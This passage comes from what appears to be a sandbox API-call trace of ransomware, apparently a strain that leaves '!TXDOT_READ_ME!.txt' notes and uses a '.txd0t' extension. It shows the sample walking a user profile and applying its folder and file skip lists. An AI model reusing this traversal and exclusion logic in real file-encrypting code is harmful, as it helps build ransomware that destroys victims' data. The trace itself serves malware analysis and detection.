StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\appdata\\local\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\boot\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\perflogs\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\programdata\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\drivers\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\wsus\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="crypt_detect") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="cryptolocker") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="ransomware") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="C:\\WINDOWS") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="C:\\Program Files") returned 0x0 [0119.207] GetProcessHeap () returned 0xe30000 [0119.207] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a0) returned 0x6874278 [0119.207] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.207] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\*", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\*") returned="C:\\Users\\FD1HVy\\*" [0119.207] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1bb0 [0119.207] StrCmpW (psz1=".", psz2=".") returned 0 [0119.207] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.208] StrCmpW (psz1="..", psz2=".") returned 1 [0119.208] StrCmpW (psz1="..", psz2="..") returned 0 [0119.208] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0119.208] StrCmpW (psz1="AppData", psz2=".") returned 1 [0119.208] StrCmpW (psz1="AppData", psz2="..") returned 1 [0119.208] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.208] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.208] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="AppData", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\system32\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\system\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\appdata\\local\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\boot\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\perflogs\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\programdata\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\drivers\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\wsus\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="crypt_detect") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="cryptolocker") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="ransomware") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="C:\\WINDOWS") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.208] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData", lpSrch="C:\\Program Files") returned 0x0 [0119.208] GetProcessHeap () returned 0xe30000 [0119.208] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xef3600 [0119.208] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0119.208] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\*") returned="C:\\Users\\FD1HVy\\AppData\\*" [0119.209] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1930 [0119.209] StrCmpW (psz1=".", psz2=".") returned 0 [0119.209] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.209] StrCmpW (psz1="..", psz2=".") returned 1 [0119.209] StrCmpW (psz1="..", psz2="..") returned 0 [0119.209] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50235c0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0119.209] StrCmpW (psz1="Local", psz2=".") returned 1 [0119.209] StrCmpW (psz1="Local", psz2="..") returned 1 [0119.209] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0119.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0119.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\", psz2="Local", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\system32\\") returned 0x0 [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\system\\") returned 0x0 [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\appdata\\local\\") returned 0x0 [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\boot\\") returned 0x0 [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\perflogs\\") returned 0x0 [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\programdata\\") returned 0x0 [0119.209] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\drivers\\") returned 0x0 [0119.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\wsus\\") returned 0x0 [0119.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="crypt_detect") returned 0x0 [0119.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="cryptolocker") returned 0x0 [0119.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="ransomware") returned 0x0 [0119.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="C:\\WINDOWS") returned 0x0 [0119.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.210] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local", lpSrch="C:\\Program Files") returned 0x0 [0119.210] GetProcessHeap () returned 0xe30000 [0119.210] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4bc) returned 0xed39f8 [0119.210] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.210] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\*", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\*") returned="C:\\Users\\FD1HVy\\AppData\\Local\\*" [0119.210] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50235c0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec19b0 [0119.210] StrCmpW (psz1=".", psz2=".") returned 0 [0119.210] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50235c0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.210] StrCmpW (psz1="..", psz2=".") returned 1 [0119.210] StrCmpW (psz1="..", psz2="..") returned 0 [0119.210] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x501e95f1, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x501e95f1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.210] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.210] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.210] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.210] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.210] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\AppData\\Local\\!TXDOT_READ_ME!.txt" [0119.210] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.210] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.210] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.211] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.211] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa96a60b1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4462fde, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa96a60b1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0119.211] StrCmpW (psz1="ActiveSync", psz2=".") returned 1 [0119.211] StrCmpW (psz1="ActiveSync", psz2="..") returned 1 [0119.211] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.211] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.211] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="ActiveSync", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync") returned="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync" [0119.211] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\system32\\") returned 0x0 [0119.211] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.211] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\system\\") returned 0x0 [0119.211] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.211] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.211] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\ActiveSync" [0119.238] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x76e74ef1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0119.238] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0119.238] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0119.238] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.238] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.239] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Adobe", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe" [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Adobe" [0119.239] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0119.239] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0119.239] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0119.239] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6a9d454, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CEF", cAlternateFileName="")) returned 1 [0119.239] StrCmpW (psz1="CEF", psz2=".") returned 1 [0119.239] StrCmpW (psz1="CEF", psz2="..") returned 1 [0119.239] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.239] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.239] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="CEF", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\CEF") returned="C:\\Users\\FD1HVy\\AppData\\Local\\CEF" [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\system32\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\system\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\CEF" [0119.239] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46a165bd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc46ec579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x476c0de7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0119.239] StrCmpW (psz1="Comms", psz2=".") returned 1 [0119.239] StrCmpW (psz1="Comms", psz2="..") returned 1 [0119.239] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.239] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.239] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Comms", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Comms") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Comms" [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\system32\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\system\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", 